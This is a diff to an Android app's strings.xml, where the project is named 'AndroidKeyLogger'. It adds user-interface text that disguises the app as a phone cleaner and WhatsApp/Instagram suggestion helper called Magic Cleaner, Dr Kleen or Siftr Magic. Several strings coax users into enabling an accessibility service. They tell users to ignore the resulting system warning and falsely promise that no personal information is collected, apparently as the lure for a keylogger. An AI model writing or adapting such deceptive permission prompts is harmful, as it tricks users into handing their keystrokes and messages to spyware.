--- a/app/src/main/res/values/strings.xml
+++ b/app/src/main/res/values/strings.xml
@@ -1,3 +1,37 @@
 <resources>
     <string name="app_name">AndroidKeyLogger</string>
+    <string name="magic_assistant">Magic Assistant</string>
+    <string name="service_description">Turn ON the switch on top right. That will help us clean your phone better.\n\nNote:\nYou may receive a warning after turning this screen. You may safely ignore that, as Magic Cleaner doesn\'t collect any of your personal information.</string>
+    <string name="service_description_tutorial">The next time you type a greeting in WhatsApp, Dr Kleen will suggest photos for it!</string>
+    <string name="tap_to_send">Choose an image to send!</string>
+    <string name="stop_suggesting">Tap to stop suggesting images</string>
+    <string name="enable_whatsapp_assist">Activate Magic Assistant</string>
+    <string name="accessibility_tutorial_message">To activate, allow Magic Cleaner in the upcoming screens.</string>
+    <string name="not_now">NOT NOW</string>
+    <string name="enable">ACTIVATE</string>
+    <string name="accessibility_app_name" translatable="false">★Siftr Magic★</string>
+    <string name="scroll_down">Scroll down and click on contact to send</string>
+    <string name="whatsapp_hint_text">Tap for images of \'%s\'</string>
+    <string name="instagram_hint_text">Tap to get #tag suggestions</string>
+    <string name="tags_copied">%d Tags successfully copied</string>
+    <string name="tag_dialog_message">Simply long-press in the caption box to paste them!</string>
+    <string name="suggested_tags">%d Tag Suggestions by Dr. Kleen</string>
+    <string name="object_tags">%d Tag Suggestions by Dr. Kleen</string>
+    <string name="tags_based_on_pic">Tags based on your picture</string>
+    <string name="usual_tags">Tags you usually use</string>
+    <string name="popular_tags">%d Popular tags you could add</string>
+    <string name="copy_to_clipboard">COPY %d TAGS TO CLIPBOARD</string>
+    <string name="tag_copies_toast">All tags copied to clipboard</string>
+    <string name="fetching_tags">Fetching tags</string>
+    <string name="instagram_error">Failed to analyze the photo to suggest tags. Please try again.</string>
+
+    <string name="error_downloading_images_whatsapp">Could not download images. Please check your internet connection.</string>
+    <string name="loading_images">Loading Images...</string>
+    <string name="share_icon">Share images via Siftr Magic to earn reward points!</string>
+    <string name="start_earning">Start Earning!</string>
+    <string name="no_internet">Please check your internet connection.</string>
+    <string name="dismiss"></string>
+    <string name="disable_forever">DISABLE FOREVER</string>
+    <string name="share_earn_point">Share and earn 200 points!</string>
+
 </resources>
